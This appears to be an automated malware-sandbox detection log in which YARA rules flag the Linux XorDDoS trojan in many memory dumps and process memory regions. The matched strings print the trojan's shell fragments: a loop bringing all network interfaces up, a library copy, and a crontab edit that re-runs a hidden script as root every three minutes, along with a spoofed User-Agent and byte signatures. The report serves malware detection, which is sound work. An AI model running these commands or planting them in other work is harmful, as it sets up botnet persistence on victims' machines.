9574.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9574.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9574.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9451.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9451.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9451.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9451.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9981.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9981.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9981.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9981.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9860.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9860.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9860.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9860.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10434.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10434.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10434.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10434.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10368.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10368.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10368.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10368.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10401.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10401.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10401.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10401.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10027.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10027.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10027.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10027.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10225.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10225.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10225.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10225.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
Process Memory Space: iJl2Sb6qRa PID: 9451	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9451	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1001:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x10c2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9454	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9454	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xb7a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc3b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9457	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9457	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1582:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1643:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9462	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9462	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9552	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9552	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xb5a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc1b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9563	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9563	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9574	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9574	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x22e5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x23a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9585	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9585	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1a8e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1b4f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9596	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9596	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1703:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x17c4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9607	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9607	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9618	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9618	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x33c7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3488:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9629	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9629	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3ac9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3b8a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9640	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9640	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3e93:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3f54:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9651	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9651	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9662	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9662	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x23ca:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x248b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9673	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9673	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2f7e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x303f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9684	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9684	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9695	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9695	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1e94:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1f55:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9706	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9706	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x24a7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2568:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9717	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9717	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x4255:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x4316:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9728	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9728	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x17e0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x18a1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9739	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9739	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1e44:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1f05:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9750	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9750	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9761	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9761	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9772	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9772	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd22:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xde3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9783	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9783	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2c86:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2d47:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9794	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9794	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1d21:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1de2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9805	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9805	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x4251:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x4312:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9816	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9816	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1f21:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1fe2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9827	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9827	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x33df:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x34a0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9838	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9838	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x95e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa1f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9849	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9849	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x265a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x271b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9860	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9860	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x37b8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3879:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9871	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9871	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x95e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa1f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9882	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9882	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2bb5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2c76:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9893	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9893	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3f7c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x403d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9904	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9904	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9915	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9915	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3523:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x35e4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9926	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9926	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9937	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9937	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x307c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x313d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9948	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9948	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9959	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9959	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x15a7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1668:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9970	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9970	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x351d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x35de:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9981	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9981	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x4249:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x430a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 9994	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 9994	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2780:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2841:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 10005	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 10005	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1548:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1609:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 10016	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 10016	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x21b6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2277:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 10027	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
